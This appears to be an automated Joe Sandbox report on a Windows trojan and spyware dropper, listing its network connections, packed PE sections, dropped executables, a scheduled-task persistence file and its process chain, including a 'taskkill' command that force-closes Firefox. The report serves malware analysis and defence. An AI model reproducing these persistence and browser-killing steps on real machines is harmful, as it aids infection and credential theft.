Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown Network traffic detected: HTTP traffic on port 50001 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50029
Source: unknown Network traffic detected: HTTP traffic on port 50037 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50001
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50045
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50047
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50050
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50029 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49901 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49907 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49942 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49962 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:49971 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50018 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50029 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50045 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50047 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:50050 version: TLS 1.2

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fa692f1b-b
Source: 8X6R8OO7U6CNLMSAL.exe, 00000015.00000002.2919840607.0000000000262000.00000002.00000001.01000000.00000011.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_fa96ee07-5
Source: 8X6R8OO7U6CNLMSAL.exe.11.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_10268e79-2
Source: 8X6R8OO7U6CNLMSAL.exe.11.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b6ab8011-e
PE file contains section with special chars
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: h3yRbjNWk1.exe Static PE information: section name: .idata
Source: h3yRbjNWk1.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .rsrc
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: ea2c7beae0.exe.6.dr Static PE information: section name:
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .rsrc
Source: ea2c7beae0.exe.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .rsrc
Source: 6a8d4317d4.exe.6.dr Static PE information: section name: .idata
Source: 6a8d4317d4.exe.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name:
Source: random[1].exe1.6.dr Static PE information: section name: .idata
Source: random[1].exe1.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name: .idata
Source: 4af6eb3e1f.exe.6.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .rsrc
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name: .idata
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name: .idata
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Creates files inside the system directory
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A5E530 6_2_00A5E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A978BB 6_2_00A978BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A98860 6_2_00A98860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A97049 6_2_00A97049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A931A8 6_2_00A931A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A54DE0 6_2_00A54DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A92D10 6_2_00A92D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A9779B 6_2_00A9779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A54B30 6_2_00A54B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_00A87F36 6_2_00A87F36
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B40228 7_2_00B40228
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B6E8A0 7_2_00B6E8A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B7A0D0 7_2_00B7A0D0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B42030 7_2_00B42030
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3E1A0 7_2_00B3E1A0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B35160 7_2_00B35160
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B74A40 7_2_00B74A40
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3A300 7_2_00B3A300
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B37CA4 7_2_00B37CA4
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B4049B 7_2_00B4049B
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B44487 7_2_00B44487
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5CCD0 7_2_00B5CCD0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5C470 7_2_00B5C470
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B335B0 7_2_00B335B0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B4C5F0 7_2_00B4C5F0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B5FD10 7_2_00B5FD10
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3BEB0 7_2_00B3BEB0
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B46EBF 7_2_00B46EBF
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: 7_2_00B3AF10 7_2_00B3AF10
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Code function: String function: 00B4D300 appears 47 times
Uses 32bit PE files
Source: h3yRbjNWk1.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: h3yRbjNWk1.exe Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: h3yRbjNWk1.exe Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: skotes.exe.0.dr Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: random[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9993038366336634
Source: ea2c7beae0.exe.6.dr Static PE information: Section: ZLIB complexity 0.9993038366336634
Source: random[1].exe0.6.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: 6a8d4317d4.exe.6.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: random[1].exe1.6.dr Static PE information: Section: vnhbgiry ZLIB complexity 0.9948363783965363
Source: 4af6eb3e1f.exe.6.dr Static PE information: Section: vnhbgiry ZLIB complexity 0.9948363783965363
Source: TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe.11.dr Static PE information: Section: nsvghvat ZLIB complexity 0.9949761059403738
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: Section: ZLIB complexity 0.9979351158038147
Source: K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe.11.dr Static PE information: Section: mjkoefrk ZLIB complexity 0.9941899341902709
Source: 6a8d4317d4.exe, 00000008.00000003.2496940953.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, 6a8d4317d4.exe, 00000008.00000002.2538148341.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, 6a8d4317d4.exe, 0000000E.00000003.2654891019.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, 6a8d4317d4.exe, 0000000E.00000002.2695730886.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, num.exe, 0000000F.00000002.2730597985.000000000066E000.00000002.00000001.01000000.0000000E.sdmp, num.exe, 0000000F.00000000.2678893540.000000000066E000.00000002.00000001.01000000.0000000E.sdmp, 6a8d4317d4.exe, 00000011.00000002.2864835627.0000000000D21000.00000040.00000001.01000000.0000000A.sdmp, 6a8d4317d4.exe, 00000011.00000003.2821857520.0000000005490000.00000004.00001000.00020000.00000000.sdmp, TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe, 00000012.00000003.2881192763.0000000005160000.00000004.00001000.00020000.00000000.sdmp, num.exe, 00000013.00000002.2900637213.000000000066E000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@31/15@36/6
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: h3yRbjNWk1.exe ReversingLabs: Detection: 44%
Source: h3yRbjNWk1.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6a8d4317d4.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe File read: C:\Users\user\Desktop\h3yRbjNWk1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\h3yRbjNWk1.exe "C:\Users\user\Desktop\h3yRbjNWk1.exe"
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe"
Source: unknown Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe "C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe "C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe"
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe "C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe"
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe "C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000350002\6a8d4317d4.exe "C:\Users\user\1000350002\6a8d4317d4.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe "C:\Users\user\AppData\Local\Temp\1000357001\4af6eb3e1f.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000401001\num.exe "C:\Users\user\AppData\Local\Temp\1000401001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe "C:\Users\user\AppData\Local\Temp\TG9CYTS7E59ZPZXS3YT9LXONWNDMZM8.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe "C:\Users\user\AppData\Local\Temp\K46P1Y9YPMFY7JJQPHSRNJ30DZ0HXET.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000349001\ea2c7beae0.exe Process created: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe "C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8X6R8OO7U6CNLMSAL.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe Section loaded: winsta.dll Jump to behavior
